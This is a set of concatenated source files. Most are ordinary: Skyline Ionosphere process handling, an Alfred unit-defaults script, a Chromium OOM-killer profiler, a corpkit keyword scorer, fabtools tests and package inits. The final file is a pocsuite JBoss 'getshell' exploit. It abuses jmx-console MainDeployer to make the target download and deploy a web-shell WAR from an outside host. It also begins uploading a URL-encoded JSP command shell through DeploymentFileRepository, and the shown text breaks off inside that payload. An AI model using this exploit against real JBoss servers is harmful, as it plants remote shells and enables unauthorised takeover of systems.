# The Redis lists are used here to replace the self.ionosphere_
# Manager().list()
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
# logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
logger.info('smtp_alerter_metrics :: %s' % str(len(ionosphere_smtp_alerter_metrics)))
logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(ionosphere_non_smtp_alerter_metrics)))
if ionosphere_job:
# @added 20190326 - Feature #2484
# First process ionosphere_echo to create any missing
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 2 metric check files, do not run
# process_ionosphere_echo to create echo features profiles
run_process_ionosphere_echo = True
if metric_var_files_count > 2:
run_process_ionosphere_echo = False
logger.info(
'not running process_ionosphere_echo as there are %s metric check files to be checked' % (
str(metric_var_files_count)))
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
# Branch #3002: docker
# Only process if there is a ionosphere.unique_metrics Redis set
if run_process_ionosphere_echo:
ionosphere_unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis smembers ionosphere.unique_metrics')
ionosphere_unique_metrics = []
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
if not ionosphere_unique_metrics:
                            logger.info('there are no metrics in the Redis ionosphere.unique_metrics set, skipping process_ionosphere_echo')
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
if ionosphere_echo_enabled and run_process_ionosphere_echo:
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis works sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile valid_learning_duration (e.g.
# 3361) later.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, IONOSPHERE_PROCESSES + 1):
if ionosphere_job:
try:
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_busy if there are queued checks
# to ensure that Ionosphere echo is rate limited if a
# lot of metrics become anomalous and that Ionosphere
# alternates between normal Mirage features profiles
# comparisons and Ionosphere echo features profiles
# during busy times.
# p = Process(target=self.spin_process, args=(i, metric_check_file))
p = Process(target=self.spin_process, args=(i, metric_check_file, ionosphere_busy))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
            # for too long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_echo which takes more time
# while time() - p_starts <= 55:
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
while time() - p_starts <= ionosphere_max_runtime:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
for p in pids:
if p.is_alive():
# @modified 20191031 - Bug #3296: Ionosphere spawn_learn_process hanging on docker
# Branch #3002 - docker
# Use terminate not join for docker
# logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
# p.join()
logger.info('killing %s - %s' % (function_name, str(p.is_alive())))
p.terminate()
# @added 20170108 - Feature #1830: Ionosphere alerts
            # Reset added lists of ionosphere_smtp_alerter_metrics and
            # ionosphere_non_smtp_alerter_metrics
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.ionosphere_smtp_alerter_metrics[:] = []
# self.ionosphere_non_smtp_alerter_metrics[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# delete_redis_sets = [
# 'ionosphere.ionosphere_smtp_alerter_metrics',
# 'ionosphere.ionosphere_non_smtp_alerter_metrics',
# ]
delete_redis_sets = [
'ionosphere.ionosphere_smtp_alerter_metrics.old',
'ionosphere.ionosphere_non_smtp_alerter_metrics.old',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
|
SoftLayer/CLI/block/__init__.py | dvzrv/softlayer-python | 126 | 12610658 | """Block Storage."""
|
Alfred/Alfred.alfredpreferences/workflows/user.workflow.5FE79F4C-9E12-42C8-9147-B4F1207AB4AE/defaults.py | rouxbuciu/prefs | 682 | 12610671 | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2017-07-16
#
"""defaults.py (save|delete) <dimensionality> <unit>
Save/delete default units for given dimensionality.
Usage:
defaults.py save <dimensionality> <unit>
defaults.py delete <dimensionality> <unit>
defaults.py --help
Options:
-h, --help Show this message
"""
from __future__ import print_function, absolute_import
from collections import defaultdict
from docopt import docopt
from workflow import Workflow3
log = None
class Defaults(object):
"""Manage default units for dimensionalities.
Saves default units in workflow's settings file.
"""
def __init__(self, wf):
"""Create new `Defaults` for workflow.
Args:
wf (Workflow3): Active Workflow3 object.
"""
self._wf = wf
self._defs = self._load()
def defaults(self, dimensionality):
"""Default units for dimensionality.
Args:
dimensionality (str): Dimensionality to return units for
Returns:
list: Sequence of default units
"""
return self._defs[dimensionality][:]
def add(self, dimensionality, unit):
"""Save ``unit`` as default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
"""
if not self.is_default(dimensionality, unit):
self._defs[dimensionality].append(unit)
self._save()
def remove(self, dimensionality, unit):
"""Remove ``unit`` as default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
"""
if self.is_default(dimensionality, unit):
self._defs[dimensionality].remove(unit)
self._save()
def is_default(self, dimensionality, unit):
"""Check whether ``unit`` is a default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
Returns:
bool: ``True`` if ``unit`` is a default.
"""
return unit in self._defs[dimensionality]
def _load(self):
defs = defaultdict(list)
defs.update(self._wf.settings.get('default_units', {}))
return defs
def _save(self):
self._wf.settings['default_units'] = dict(self._defs)
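# Usage sketch for the Defaults helper (the dimensionality/unit values below are
# purely illustrative):
#   defs = Defaults(wf)
#   defs.add('[length]', 'kilometer')
#   defs.is_default('[length]', 'kilometer')  # -> True
#   defs.defaults('[length]')                 # -> ['kilometer']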
def main(wf):
"""Run script."""
args = docopt(__doc__, wf.args)
log.debug('args=%r', args)
defs = Defaults(wf)
log.debug('defaults=%r', defs._defs)
dimensionality = args['<dimensionality>']
unit = args['<unit>']
if args['save']:
defs.add(dimensionality, unit)
print(u'Saved {} as default unit for {}'.format(unit, dimensionality))
return
if args['delete']:
defs.remove(dimensionality, unit)
print(u'Removed {} as default unit for {}'.format(unit, dimensionality))
return
if __name__ == '__main__':
wf = Workflow3()
log = wf.logger
wf.run(main)
|
tools/telemetry/telemetry/core/platform/profiler/oomkiller_profiler.py | nagineni/chromium-crosswalk | 231 | 12610682 | <reponame>nagineni/chromium-crosswalk<gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.core import util
from telemetry.core.backends.chrome import android_browser_finder
from telemetry.core.platform import profiler
class UnableToFindApplicationException(Exception):
"""Exception when unable to find a launched application"""
def __init__(self, application):
super(UnableToFindApplicationException, self).__init__()
self.application = application
def __str__(self):
return repr(self.application)
class OOMKillerProfiler(profiler.Profiler):
"""Android-specific, Launch the music application and check it is still alive
at the end of the run."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(OOMKillerProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
if not 'mem_consumer_launched' in state:
state['mem_consumer_launched'] = True
mem_consumer_path = util.FindSupportBinary(
os.path.join('apks', 'MemConsumer.apk'),
executable=False)
assert mem_consumer_path, ('Could not find memconsumer app. Please build '
'memconsumer target.')
self._browser_backend.adb.Install(mem_consumer_path)
self._browser_backend.adb.GoHome()
self._platform_backend.LaunchApplication(
'org.chromium.memconsumer/.MemConsumer',
'--ei memory 20')
# Bring the browser to the foreground after launching the mem consumer
self._browser_backend.adb.StartActivity(browser_backend.package,
browser_backend.activity,
True)
@classmethod
def name(cls):
return 'oomkiller'
@classmethod
def is_supported(cls, browser_type):
if browser_type == 'any':
return android_browser_finder.CanFindAvailableBrowsers()
return browser_type.startswith('android')
@classmethod
def WillCloseBrowser(cls, browser_backend, platform_backend):
browser_backend.adb.CloseApplication('org.chromium.memconsumer')
def CollectProfile(self):
missing_applications = self._MissingApplications()
if not len(missing_applications):
return []
raise UnableToFindApplicationException(', '.join(missing_applications))
def _MissingApplications(self):
# TODO(qsr): Add com.android.launcher to the list, when the reason why the
# launcher is often killed is understood.
must_have_apps = [
'org.chromium.memconsumer',
]
return [app for app in must_have_apps if
not self._platform_backend.IsApplicationRunning(app)]
|
corpkit/keys.py | interrogator/corpk | 216 | 12610685 | <filename>corpkit/keys.py
"""corpkit: simple keyworder"""
from __future__ import print_function
from corpkit.constants import STRINGTYPE, PYTHON_VERSION
def keywords(target_corpus,
reference_corpus='bnc.p',
threshold=False,
selfdrop=True,
calc_all=True,
measure='ll',
sort_by=False,
print_info=False,
**kwargs):
"""Feed this function some target_corpus and get its keywords"""
from pandas import DataFrame, Series
from collections import Counter
from corpkit.interrogation import Interrogation
def data_to_dict(target_corpus):
"""turn Series/DataFrame into Counter"""
if isinstance(target_corpus, Interrogation):
if hasattr(target_corpus, 'results'):
target_corpus = target_corpus.results
else:
target_corpus = target_corpus.totals
if isinstance(target_corpus, Series):
return Counter(target_corpus.to_dict())
elif isinstance(target_corpus, DataFrame):
return Counter(target_corpus.sum().to_dict())
else:
return Counter(target_corpus)
def log_likelihood_measure(word_in_ref, word_in_target, ref_sum, target_sum):
"""calc log likelihood keyness"""
import math
neg = (word_in_target / float(target_sum)) < (word_in_ref / float(ref_sum))
E1 = float(ref_sum)*((float(word_in_ref)+float(word_in_target)) / \
(float(ref_sum)+float(target_sum)))
E2 = float(target_sum)*((float(word_in_ref)+float(word_in_target)) / \
(float(ref_sum)+float(target_sum)))
if word_in_ref == 0:
logaE1 = 0
else:
logaE1 = math.log(word_in_ref/E1)
if word_in_target == 0:
logaE2 = 0
else:
logaE2 = math.log(word_in_target/E2)
score = float(2* ((word_in_ref*logaE1)+(word_in_target*logaE2)))
if neg:
score = -score
return score
def perc_diff_measure(word_in_ref, word_in_target, ref_sum, target_sum):
"""calculate using perc diff measure"""
norm_target = float(word_in_target) / target_sum
norm_ref = float(word_in_ref) / ref_sum
# Gabrielatos and Marchi (2012) do it this way!
if norm_ref == 0:
norm_ref = 0.00000000000000000000000001
return ((norm_target - norm_ref) * 100.0) / norm_ref
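    # Worked example for the two measures above (counts are hypothetical):
    # with word_in_target=50, word_in_ref=10, target_sum=10000, ref_sum=100000
    # the normalised frequencies are 0.005 vs 0.0001, so perc_diff_measure
    # returns ((0.005 - 0.0001) * 100.0) / 0.0001 = 4900.0, i.e. a strongly
    # over-used keyword; log_likelihood_measure would likewise return a
    # positive score because the target frequency exceeds the reference
    # frequency.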
def set_threshold(threshold):
"""define a threshold"""
if threshold is False:
return 0
if threshold is True:
threshold = 'm'
if isinstance(threshold, STRINGTYPE):
if threshold.startswith('l'):
denominator = 800
if threshold.startswith('m'):
denominator = 400
if threshold.startswith('h'):
denominator = 100
totwords = sum(loaded_ref_corpus.values())
return float(totwords) / float(denominator)
else:
return threshold
def calc_keywords(target_corpus, reference_corpus):
"""
get keywords in target corpus compared to reference corpus
this should probably become some kind of row-wise df.apply method
"""
# get total num words in ref corpus
key_scores = {}
ref_sum = sum(reference_corpus.values())
if isinstance(target_corpus, dict):
target_sum = sum(target_corpus.values())
if isinstance(target_corpus, Series):
target_sum = target_corpus.sum()
# get words to calculate
if calc_all:
wordlist = list(set(list(target_corpus.keys()) + list(reference_corpus.keys())))
else:
wordlist = list(target_corpus.keys())
wordlist = [(word, reference_corpus[word]) for word in wordlist]
for w, s in wordlist:
if s < threshold:
global skipped
skipped += 1
continue
word_in_ref = reference_corpus.get(w, 0)
word_in_target = target_corpus.get(w, 0)
if kwargs.get('only_words_in_both_corpora'):
if word_in_ref == 0:
continue
score = measure_func(word_in_ref, word_in_target, ref_sum, target_sum)
key_scores[w] = score
return key_scores
# load string ref corp
if isinstance(reference_corpus, STRINGTYPE):
from corpkit.other import load
ldr = kwargs.get('loaddir', 'dictionaries')
reference_corpus = load(reference_corpus, loaddir=ldr)
# if a corpus interrogation, assume we want results
if isinstance(target_corpus, Interrogation):
reference_corpus = reference_corpus.results
# turn data into dict
loaded_ref_corpus = data_to_dict(reference_corpus)
df = target_corpus
index_names = list(df.index)
results = {}
threshold = set_threshold(threshold)
global skipped
skipped = 0
# figure out which measure we're using
if measure == 'll':
measure_func = log_likelihood_measure
elif measure == 'pd':
measure_func = perc_diff_measure
else:
raise NotImplementedError("Only 'll' and 'pd' measures defined so far.")
for subcorpus in index_names:
if selfdrop:
ref_calc = loaded_ref_corpus - Counter(reference_corpus.ix[subcorpus].to_dict())
else:
ref_calc = loaded_ref_corpus
results[subcorpus] = calc_keywords(df.ix[subcorpus], ref_calc)
if print_info:
print('Skipped %d entries under threshold (%d)\n' % (skipped, threshold))
df = DataFrame(results).T
df.sort_index()
if not sort_by:
df = df[list(df.sum().sort_values(ascending=False).index)]
return df
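# Illustrative call (argument values are hypothetical):
#   kw = keywords(interrogation_results_df, reference_corpus='bnc.p',
#                 threshold='m', measure='ll')
# returns a DataFrame of keyness scores with one row per subcorpus.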
|
fabtools/tests/test_oracle_jdk.py | timgates42/fabtools | 308 | 12610773 | <reponame>timgates42/fabtools
import mock
import unittest
class OracleJdkTestCase(unittest.TestCase):
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_x64_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
get_arch.return_value = 'x86_64'
self.assertEqual('x64', _required_jdk_arch())
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_32bit_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
for system_arch in ['i386', 'i486', 'i586', 'i686']:
get_arch.return_value = system_arch
self.assertEqual('i586', _required_jdk_arch())
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_unknown_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
get_arch.return_value = 'unknown'
self.assertRaises(Exception, _required_jdk_arch)
def test_jdk_version_with_update_over_ten(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_13"
Java(TM) SE Runtime Environment (build 1.7.0_13-b20)
Java HotSpot(TM) Client VM (build 23.7-b01, mixed mode)
'''
self.assertEqual('7u13-b20', _extract_jdk_version(java_version_out))
def test_jdk_version_with_update_under_ten(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_09"
Java(TM) SE Runtime Environment (build 1.7.0_09-b05)
Java HotSpot(TM) 64-Bit Server VM (build 23.5-b02, mixed mode)
'''
self.assertEqual('7u9-b05', _extract_jdk_version(java_version_out))
def test_jdk_version_with_openjdk(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_21"
OpenJDK Runtime Environment (IcedTea 2.3.9) (7u21-2.3.9-0ubuntu0.12.04.1)
OpenJDK 64-Bit Server VM (build 23.7-b01, mixed mode)
'''
self.assertEqual(None, _extract_jdk_version(java_version_out))
|
src/biotite/application/sra/__init__.py | danijoo/biotite | 208 | 12610782 | <filename>src/biotite/application/sra/__init__.py<gh_stars>100-1000
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
"""
A subpackage for obtaining sequencing data from the *NCBI*
*sequence read archive* (SRA).
"""
__name__ = "biotite.application.sra"
__author__ = "<NAME>"
from .app import * |
vul/13-JBoss-serialization-getshell.py | zx273983653/vulscan | 582 | 12610787 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# command-line mode
from pocsuite import pocsuite_cli
# verification module
from pocsuite import pocsuite_verify
# attack module
from pocsuite import pocsuite_attack
# console mode
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
"""
Detection of three JBoss PoC vulnerability vectors. author: https://github.com/joaomatosf/jexboss
"""
from sys import exit, version_info
from time import sleep
from random import randint
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
except ImportError:
ver = version_info[0] if version_info[0] >= 3 else ""
raise ("\n * Package urllib3 not installed. Please install the package urllib3 before continue.\n"
+ " Example: \n"
+ " # apt-get install python%s-pip ; easy_install%s urllib3\n" % (ver, ver))
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
# suppress the warning messages
disable_warnings()
# thread-safe connection pool
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
class JbossPOC(POCBase):
    vulID = '13'  # ssvid ID; if the PoC is submitted together with the vulnerability report, use 0
    version = '1'  # defaults to 1
    vulDate = '2017-06-29'  # date the vulnerability was disclosed; use today's date if unknown
    author = '<EMAIL>'  # PoC author
    createDate = '2017-06-29'  # date the PoC was written
    updateDate = '2017-06-29'  # date the PoC was updated; defaults to the creation date
    references = 'https://github.com/Xyntax/POC-T'  # source of the vulnerability report; not needed for 0days
    name = 'JBoss serialization getshell'  # PoC name
    appPowerLink = 'http://www.jboss.org/'  # vendor homepage
    appName = 'JBoss'  # affected application name
    appVersion = 'www.seebug.org/vuldb/ssvid-89723'  # affected versions
    vulType = 'code-exec'  # vulnerability type; see the vulnerability type specification table
    desc = '''
        JBoss deserialization vulnerability
    '''  # brief description of the vulnerability
    samples = ["192.168.127.12:8087","172.16.17.32:8087",]  # test samples: targets verified with this PoC
    install_requires = []  # PoC third-party module dependencies; avoid third-party modules where possible (see the PoC dependency guidelines)
    cvss = u"严重"  # severity: one of 严重 (critical), 高危 (high), 中危 (medium), 低危 (low)
def get_successfully(self,url, path):
"""
Test if a GET to a URL is successful
:param url: The base URL
:param path: The URL path
:return: The HTTP status code
"""
sleep(5)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
if result == 404:
sleep(7)
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
return result
def exploit_jmx_console_main_deploy(self,url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://" + url
jsp = "http://www.joaomatosf.com/rnp/jexws.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0=" + jsp)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_console_file_repository(self,url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75"
"%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e"
"%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46"
"%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74"
"%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d"
"%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65"
"%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e"
"%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30"
"%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22"
"%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d"
"%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22"
"%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b"
"%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73"
"%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48"
"%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75"
"%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69"
"%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77"
"%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28"
"%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20"
"%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63"
